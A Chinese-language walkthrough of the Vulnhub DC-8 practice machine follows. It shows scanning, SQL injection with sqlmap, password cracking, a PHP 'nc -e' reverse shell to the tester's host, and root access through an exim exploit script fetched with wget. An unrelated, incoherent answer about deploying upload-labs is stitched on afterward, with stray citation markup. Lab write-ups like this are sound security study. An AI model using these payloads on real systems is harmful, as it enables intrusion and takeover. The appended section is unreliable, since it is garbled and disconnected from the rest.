VulnhubDC-8靶机详解

项目地址

https://vulnhub.com/entry/dc-8,367/


注:在监听那块可能出现图片中的监听端口不同,因为博主做了两次,截图截茬了,在此表示歉意
(监听端口只需要一个即可)

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

image.png

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

image.png

根据对比可知DC-8的一个ip地址为192.168.47.133

扫描DC-8的操作系统,端口及对应服务

nmap -A -p- 192.168.47.133

image.png

发现开放22端口

Kali开启ssh服务,在浏览器访问http://192.168.47.133

image.png
image.png

点击页面中的字体发现URL带有参数,说明可能能进行SQL注入

image.png

输入(’),页面进行跳转,说明存在SQL注入

image.png

用sqlmap跑一下,看有没有东西

sqlmap -u "http://192.168.47.133/?nid=1" 

image.png

sqlmap -u "http://192.168.47.133/?nid=1" -dbs

image.png

sqlmap -u "http://192.168.47.133/?nid=1" -D d7db -tables

image.png

sqlmap -u "http://192.168.47.133/?nid=1" -D d7db -T users -dump

image.png

将两串字符串进行保存

image.png
image.png

使用john进行破解

image.png
ps:如果出现下述情况可输入

watch rm -rf /root/.john/john.rec				//每两秒删除一次这个文件

image.png
可得出一个叫turtle的密码

测试能不能直接账号对 DC-8 进行ssh登录

image.png
登陆失败

对网站进行目录和文件扫描

dirb http://192.168.47.133

image.png
image.png
出现robots.txt文件

进入网站进行查询

image.png
发现存在用户登录的一个界面

进入用户登录界面,使用刚才的admin和john进行登录测试

image.png
image.png
经过测试发现正确的账户名和密码为john和turtle

经过各种搜索发现,在这个地方可以执行php代码

image.png
image.png

先选择【php code】然后填写反弹shell的命令

<?php system("nc -e /bin/bash 192.168.47.129 7897"); ?>
这里的IP地址为kali的IP地址

image.png

提交

image.png

在kali设置监听命令等待靶机反弹shell

nc -lvvp 7897

image.png

在view随便输入一些信息进行提交

image.png

shell反弹成功

image.png

获取一个交互式的shell

python -c "import pty; pty.spawn('/bin/bash')"

image.png

接下来想办法提权(suid提权)

查看可以用于suid提权的命令
find / -user root -perm -4000 -print 2>/dev/null

image.png
发现一个比较奇怪的命令

使用/usr/sbin/exim4 --version查看一下版本信息

image.png

使用命令searchsploit exim 4搜索可以利用的提权方法

image.png
选择使用46996.sh

将kali机的apache服务开启
service apache2 start

image.png

将攻击脚本文件复制到Apache服务的根目录/var/www/html下

image.png

在kali中使用set ff=unix,告诉编译器,使用unix换行符,否则会无法使用脚本image.png

在靶机反弹回来的shell处使用命令将脚本下载到靶机中
wget http://192.168.47.129/exp.sh

image.png
没有权限
选择一个不需要root用户权限的目录,比如tmp
image.png

下载成功后给予权限

image.png

使用命令执行脚本
./exp.sh -m netcat

image.png

输入whoami进行查看

出现root说明提权成功
image.png

cd /root进入并使用ls进行查看文件

image.png

cat flag.txt查看flag内容

image.png

  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 root@node4.buuoj.cn` 2. 下载并解压upload-labs靶机安装包。您可以使用提供的链接下载`upload-labs-0.1.zip`文件。将其解压缩,并将相关文件放入容器中以供运行。 3. 确保您的Kali Linux系统满足Docker的运行要求。首先,检查当前Linux系统的内核版本,使用以下命令: `uname -a` 如果内核版本大于等于3.10,您的系统符合要求。否则,您可能需要更新内核或使用支持Docker的其他系统。 4. 更新apt源以满足下载要求。根据您的具体需求,可能需要更新apt源来获取所需的软件包。 5. 启动upload-labs靶机。根据提供的问题描述,您可能需要进行代码审计,并利用文件包含漏洞,通过URL参数来读取敏感文件。一个示例的URL可能是:`http://your-upload-labs-url/?file=/flag`,其中`your-upload-labs-url`是您部署upload-labs靶机的URL地址。您需要根据具体情况进行进一步的测试和配置。 请注意,这只是一个简要的概述,并且具体的部署步骤可能会因不同的环境和需求而有所不同。建议您参考相关文档和指南以获取更详细的部署信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值